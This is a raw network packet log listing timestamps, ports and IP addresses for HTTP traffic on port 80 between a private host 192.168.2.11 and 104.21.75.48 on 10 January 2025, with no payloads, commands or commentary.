Jan 10, 2025 19:12:30.347286940 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.347310066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.347310066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.351886988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.351911068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.351965904 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.351975918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.351975918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.351982117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.352030039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.352030039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.356669903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.356703043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.356719017 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.356733084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.356748104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.356772900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.356772900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.356935024 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.361403942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.361427069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.361443043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.361457109 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.361490011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.361490011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.361624002 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.366194010 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.366219044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.366233110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.366250992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.366266966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.366266966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.366509914 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.380395889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.380414009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.380424976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.380436897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.380497932 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.380527973 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.385056973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.385077953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.385112047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.385124922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.385138035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.385149002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.385175943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.385175943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.385219097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.389812946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.389843941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.389858007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.389863968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.389870882 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.389884949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.389899015 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.389903069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.389924049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.389939070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.394526005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394552946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394562960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394577980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394588947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.394598007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394608974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394618988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.394619942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.394656897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.399271011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.399297953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.399308920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.399329901 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.399338961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.399338961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.399343967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.399354935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.399368048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.399368048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.399420977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.404026985 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404057026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404071093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404083014 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404095888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.404098034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404109001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404120922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.404201984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.404201984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.408803940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408833027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408848047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408860922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408871889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408883095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408896923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.408921003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.408921003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.408982038 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.413624048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.413645029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.413655996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.413667917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.413685083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.413697004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.413753033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.413753033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.418366909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.418385029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.418399096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.418411016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.418421984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.418441057 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.418476105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.418476105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.423140049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.423157930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.423168898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.423181057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.423192978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.423203945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.423221111 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.423252106 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.423336029 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.427860022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.427882910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.427894115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.427905083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.427917004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.427930117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.427954912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.427954912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.428248882 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.432622910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.432636976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.432646990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.432657957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.432670116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.432679892 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.432681084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.432740927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.432740927 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.437330008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.437345028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.437362909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.437375069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.437375069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.437406063 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.437942028 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442215919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442229033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442240953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442251921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442262888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442306042 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442306042 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442333937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442346096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442357063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442368984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442379951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442390919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442399979 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442399979 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442403078 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442414045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442425013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442435980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442446947 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442449093 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442449093 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442456961 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442480087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442483902 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442485094 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442491055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442502022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442512989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442524910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442536116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442542076 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442542076 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442547083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442559004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442570925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442583084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442595005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442596912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442596912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442606926 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442617893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442627907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442636967 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442636967 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442640066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442650080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442661047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442679882 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442686081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442692041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442686081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442703962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442714930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442725897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442730904 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442730904 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442737103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442751884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442763090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442775011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442787886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442787886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442791939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442804098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442815065 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442821980 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442821980 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442826986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442838907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442852020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442862988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442873955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442876101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442876101 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442884922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442895889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442905903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442918062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442919016 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442919016 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442929983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442944050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442955971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442965984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442965984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.442967892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.442980051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443022966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443022966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443814039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443825960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443839073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443851948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443864107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443870068 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443876982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443888903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443901062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443905115 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443905115 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443912029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443922997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443923950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443936110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443948030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443958998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443959951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443959951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.443979025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.443990946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444004059 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444006920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444015980 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444016933 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444030046 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444041967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444053888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444056988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444056988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444065094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444076061 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444087982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444097996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444109917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444120884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444123983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444123983 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444133043 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444144011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444155931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444169044 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444169044 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444170952 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444185019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444188118 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444195986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444206953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444217920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444228888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444236040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444236040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444241047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444252014 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444262981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444276094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444284916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444284916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444288969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444298029 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444299936 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444318056 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444367886 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444641113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444653988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444667101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444678068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444688082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444690943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444700956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444736958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444736958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444753885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444766045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444777012 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444787979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444799900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444812059 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444822073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444822073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444822073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444833994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444844961 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444858074 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.444881916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444881916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.444993019 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445179939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445192099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445197105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445203066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445214987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445225954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445236921 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445238113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445250988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445262909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445274115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445278883 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445278883 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445286036 CET	80	49726	104.21.75.48	192.168.2.11
